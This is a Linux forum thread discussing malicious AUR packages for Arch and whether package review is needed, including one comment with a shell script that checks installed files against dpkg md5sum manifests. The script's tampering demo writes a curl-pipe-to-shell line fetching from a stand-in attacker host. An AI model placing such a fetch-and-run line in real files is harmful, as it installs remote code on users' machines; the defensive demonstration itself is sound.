this post was submitted on 01 Aug 2025

Linux


A community for everything relating to the GNU/Linux operating system (except the memes!)

[–] thatradomguy@lemmy.world 1 points 1 hour ago

Whenever I read these headlines, I always immediately hear the "my brand" commercial guy stim in my head.

[–] sanderium@lemmy.zip 9 points 17 hours ago

pacman -Qqem to list your foreign packages (usually AUR ones)

[–] F04118F@feddit.nl 29 points 23 hours ago* (last edited 22 hours ago) (1 children)

TL;DR: If you haven't installed google-chrome-stable recently from AUR, you're not affected.

[–] Aatube@kbin.melroy.org 21 points 22 hours ago (1 children)

if you didn't install google-chrome-stable yesterday*

The real package used to be called google-chrome-stable many moons ago.

[–] F04118F@feddit.nl 1 points 22 hours ago

Thanks, edited!

[–] generator@lemmy.zip 17 points 1 day ago* (last edited 1 day ago) (2 children)

That's why you shouldn't blindly trust AUR, and always review the scripts before installing.

But something needs to change:

  • packages need to be reviewed (maybe also updates from new/untrusted users)
  • New package adoption needs to be reviewed
  • Trusted users don't need package review
  • Trusted users can review new packages (from other users)

This won't stop here; more malware packages will appear. Arch and Linux in general are getting more users and becoming a target, not only the Arch Linux AUR but also other distros with custom repositories. Many users install packages from custom repositories blindly, or follow guides without any knowledge of what they do.

2025 is the year of malware on Linux

[–] h4x0r@lemmy.dbzer0.com 10 points 17 hours ago (1 children)

Why does anything need to change? The AUR is functioning as intended, a low friction system for users to provide packages outside of the official repositories. This has always been a possible consequence of not reviewing the PKGBUILD. I don't see why everything needs guardrails, some things have sharp edges, handle with care!

Given how often the 'btw' spammers evangelize how they learned soooo much about linux and their 'minimal system' cause they managed to format a disk manually and chroot, not installing malware from an untrusted source ought to be a no brainer. Even if you solved this particular problem the same people will be just a curl | sh away from pwning themselves. Should we start requiring forced auth to pipe?

The maintainers are welcome to do whatever they like, but it would be nice to have at least a few places where we don't cater to the lowest common denominator and still RTFM.

[–] generator@lemmy.zip 1 points 16 hours ago* (last edited 16 hours ago)

The fact that the packages were removed only a few hours after being published just makes my point about "trusted users" reviewing and reporting them.

And it's not only an Arch Linux/AUR problem; the same happens with Python pip, npm, Docker Hub, GitHub... The bigger the popularity, the bigger the target.

These days, after the success of the Steam Deck, many users switched to Linux, and many of those started using Arch or Arch-based distros like EndeavourOS because someone on Reddit, YouTube or elsewhere said it's the best for new hardware and you can find everything you need on the AUR.
New users won't review scripts or PKGBUILDs; that's gibberish to them. They just search and install, and a few hours could be too late for some.

I don't care if Linux loses or gains popularity, but if there are no guardrails or some kind of control, things could get worse, and even end the AUR as it is now.

Having people control what's published or not is probably not the best solution, but leaving it as a wild west isn't either.

[–] TeddE@lemmy.world 7 points 19 hours ago (1 children)

This is absolutely a shortcoming of Arch - but I don't see it getting fixed soon. Your change is practical, and could reduce the attack surface for bad actors, but it also introduces gatekeeping and would slow down time from code change to deployment. The open community and blazing fast end-to-end turnaround are both Arch key features (in my opinion).

If you prefer more vetted code, there's other great distros (Debian leaps to mind).

But honestly - yes, some people got hurt - but it was addressed in a day. That's not a bad turnaround ~ I've certainly seen the damage wrought by Windows- and iOS-based malware run at least that long.

This can be seen as the system working as intended. Please don't run Arch on mission critical systems. There's other distros for that. While this vulnerability is Arch-specific, this OS is often a canary for others. But if you can tolerate being on the frontier, Arch is very well documented and is great for learning - and yes it has some risk.

[–] generator@lemmy.zip 5 points 18 hours ago* (last edited 18 hours ago) (1 children)

Arch also warns users about the AUR: use at your own risk, and it can break your system.

My approach is definitely not the best solution; I was saying this is only the beginning, and with other Arch-based distros also using the AUR it only gets worse. If there isn't any moderation and some kind of package control before publishing, then when things get really bad it may be too late and Arch starts losing users.

Now it's just some packages; later it could be some popular package takeovers or some kind of spoofing of other packages.

I use Arch BTW (since 2011), and ~~Debian~~ Armbian on a Raspberry Pi; one is rock solid, the other sometimes breaks with updates.

[–] TeddE@lemmy.world 3 points 17 hours ago

I think we're broadly in agreement here, and I think both our statements are important to the Linux discussion. Moreover, we're not speaking privately - I wish I could direct recent converts from Windows to this thread as a whole, as you offer good advice - be wary of your sources & learning how to inspect gifts you're offered is excellent advice.

[–] MangoPenguin@lemmy.blahaj.zone 5 points 19 hours ago (2 children)

Can someone explain how the AUR isn't the same as running a random bash script you found on the internet?

[–] MrMcGasion@lemmy.world 13 points 15 hours ago* (last edited 15 hours ago) (1 children)

It's not any different from running a random bash script, which is why according to the Arch wiki, users of the AUR should "verify that the PKGBUILD and accompanying files are not malicious or untrustworthy." That's also why good AUR helpers ask if you want to look at the PKGBUILD every time you install or update anything, because best practice is to read them every time so you know what it's doing.

The AUR is there for convenience, which means it tends to get used by newbies who really probably shouldn't be using it. But I also won't pretend that I follow the guidance every time myself.

[–] MangoPenguin@lemmy.blahaj.zone 1 points 2 minutes ago

I don't really know how a newbie is supposed to review the build and files lol

[–] torch_and_blanket@sopuli.xyz 3 points 18 hours ago

AUR installation scripts are even written in bash.

[–] Sxan@piefed.zip 11 points 1 day ago* (last edited 1 day ago) (4 children)

Ðis is why we can't have nice þings.

Maybe AUR needs a different way of approving submitters. Currently, it's absurdly easy to register to submit a package.

Is anyone from AUR working wiþ Github to nail down ðe offenders on ðat side? Most of ðese packages are probably being pulled from ðere.

[–] DapperPenguin@programming.dev 13 points 23 hours ago (1 children)

Can't people just make new accounts? I have no experience with Arch, but it sounds like this AUR is set up exactly to be a low barrier to entry. Essentially, it seems like the community needs to address this by having proper education about not blindly trusting packages and doing follow-up research. Otherwise, a lot of grunt work will be needed to verify every package beforehand, which is expensive.

[–] Sxan@piefed.zip -1 points 19 hours ago (1 children)

Yah, ðey can, and AUR is clearly marked as "use at your own risk." However, it's part of ðe ecosystem, and people do use it, and frankly a lot of people use it because of AUR. Last I checked, Arch had the largest number of software packages of any distribution... if you include AUR. It's much, much smaller wiþout it.

Ðere are almost no checks on AUR, which to me means ðere are probably some basic, low-effort ways security could be improved, if Arch cares. Not no effort, of course, but still not ðe level of effort ðat Alpine, for example, puts into Experimental.

[–] Aatube@kbin.melroy.org 2 points 14 hours ago (1 children)

nixos has the largest amount of packages

[–] Sxan@piefed.zip 1 points 8 hours ago (1 children)

You're technically right, if you count duplicate packages. However, NixOS has fewer unique packages.

According to Repology (which NixOS uses as its claim for "most packages") NixOS has 22,127 unique packages; AUR (AUR only, mind, not AUR plus the three core repositories) has 38,915. There are another 15,562 in Arch core, extra, and community.

At first I þought "unique" meant "unique to ðe distro", but 7zip is listed in ðat unique list for NixOS, and 7zip is included in almost every distro; so Repology must mean "non-duplicate packages in this distro".

[–] Aatube@kbin.melroy.org 2 points 3 hours ago (1 children)

Repology defines "unique" as "package is only present in a single repository family, there are no other sources to compare it against, so although it's the latest version known to repology, is not really reliable", which I take to mean that the software is only packaged by that distribution, not that 60% of AUR is duplicate packages.

[–] Sxan@piefed.zip 0 points 2 hours ago (1 children)

Ðis is exactly what I first checked. Repology lists 7zip in NixOS's "unique packages" but it's in almost every distro.

[–] Aatube@kbin.melroy.org 1 points 2 hours ago (1 children)

I don't see where you see 7zip in the list of unique packages (https://repology.org/projects/?inrepo=nix_unstable&families=1). I only see the unrelated 7z2hashcat.

[–] Sxan@piefed.zip 1 points 1 hour ago

Huh. Yeah, me neiðer, anymore. Now when I look, ðey do all seem, well, at least not in Arch repos.

I retract my statement: I was mistaken. And color me surprised ðat Nix has so many packages. Ðe number of package contributors is huge, too, considering NixOS doesn't seem to make it into ðe top-10 of popularity lists (for what ðey're worþ). Ðat's a dedicated user base; it's like every user is submitting a package.

[–] h4x0r@lemmy.dbzer0.com 7 points 1 day ago

Ðis is why we can't have nice þings.

Not reviewing the PKGBUILD when using the AUR is a self pwn.

[–] Aatube@kbin.melroy.org 3 points 22 hours ago (1 children)

The first wave used some random GitLab instance and this wave appears to have used some 100MB version of catbox (https://segs.lol/). Both had deleted the payload files when I tried to obtain them

[–] Sxan@piefed.zip 0 points 20 hours ago

Hmmm. Sounds like some low hanging fruit to hinder attacks wiþout incurring e.g. ðe cost of ðe full Alpine Experimental review process.

[–] commie@lemmy.dbzer0.com 3 points 1 day ago (2 children)
[–] woelkchen@lemmy.world 1 points 1 day ago

Something, something nice bings and oat sides.

[–] Sxan@piefed.zip 1 points 1 day ago

And I love you, commie!

[–] Vanilla_PuddinFudge 3 points 21 hours ago (1 children)

Imagine how many they haven't stumbled across yet.

[–] corsicanguppy@lemmy.ca 1 points 15 hours ago* (last edited 15 hours ago)

The question is always "how do you know" in security.

But it's not just AURs. DEBs have a long-standing gap in their package validation options ("how do you know that file is deployed as intended") and they're at risk.
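The "how do you know that file is deployed as intended" question above does have a partial answer in the dpkg database: each installed package leaves /var/lib/dpkg/info/<pkg>.md5sums, one "<md5>  <path relative to />" line per file, and debsums replays that manifest against the filesystem. The script below is an added example for this thread, not dpkg or debsums code. It reimplements that comparison against an arbitrary root so it runs offline on a constructed tree, then tampers with the tree to show what the check does and does not catch. The package name, paths, file contents and the attacker.example host in the tampered file are all made up for the demo.

```shell
#!/bin/sh
# Added example for this thread (not from Debian, dpkg or debsums): the per-file check
# that the dpkg database does make possible. dpkg keeps /var/lib/dpkg/info/<pkg>.md5sums,
# one "<md5>  <path relative to />" line per installed file, and `debsums` compares those
# against the filesystem. verify_md5sums does the same against any root so it runs
# offline on a constructed tree. Names, paths and contents below are made up for the demo.

# verify_md5sums MANIFEST ROOT: prints "MODIFIED<TAB>path" or "MISSING<TAB>path" per
# mismatch; exit 0 when every listed file matches, 1 otherwise.
verify_md5sums() {
    manifest=$1
    root=$2
    status=0
    while IFS= read -r entry; do
        [ -n "$entry" ] || continue
        want=${entry%% *}
        path=${entry#*  }     # two-space separator, as md5sum and dpkg write it
        if [ ! -f "$root/$path" ]; then
            printf 'MISSING\t%s\n' "$path"
            status=1
            continue
        fi
        have=$(md5sum "$root/$path" | cut -d' ' -f1)
        if [ "$have" != "$want" ]; then
            printf 'MODIFIED\t%s\n' "$path"
            status=1
        fi
    done <"$manifest"
    return "$status"
}

# make_demo_tree: a fake root holding a two-file "hello" package and the manifest dpkg
# would have recorded for it at install time. Prints the root directory.
make_demo_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/usr/bin" "$root/etc" "$root/var/lib/dpkg/info"
    printf '#!/bin/sh\necho hello\n' >"$root/usr/bin/hello"
    printf 'verbose=0\n' >"$root/etc/hello.conf"
    (cd "$root" && md5sum usr/bin/hello etc/hello.conf) >"$root/var/lib/dpkg/info/hello.md5sums"
    printf '%s\n' "$root"
}

# tamper_demo_tree ROOT: what a post-install compromise looks like on disk. The binary is
# replaced by a stager (constructed; attacker.example is a reserved name) and a config
# file disappears.
tamper_demo_tree() {
    printf '#!/bin/sh\ncurl -fsSL https://attacker.example/x | sh\necho hello\n' >"$1/usr/bin/hello"
    rm -f "$1/etc/hello.conf"
}

# Demo: the clean tree verifies, the tampered tree does not.
root=$(make_demo_tree)
manifest=$root/var/lib/dpkg/info/hello.md5sums
verify_md5sums "$manifest" "$root" && echo "clean: all files match manifest"
tamper_demo_tree "$root"
verify_md5sums "$manifest" "$root" || echo "tampered: see mismatches above"
```

The caveat is the one the comment is really about. The manifest is unsigned and lives on the same disk as the files it describes, so anything running as root can rewrite both, and md5 offers no protection against a deliberately colliding replacement; this catches accidental drift and sloppy tampering, not a competent root-level compromise. Real debsums also skips conffiles by default because files under /etc are expected to change, and mtimes or permissions are not covered at all. For an answer you can stand behind, compare against the original .deb (apt-get download) or a manifest kept off the box. On Arch the equivalent local check is pacman -Qkk, with the same limitation.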

[–] bhamlin@lemmy.world -1 points 16 hours ago

In other news, Arch users getting what they asked for. A difficult and highly customizable Linux. 😉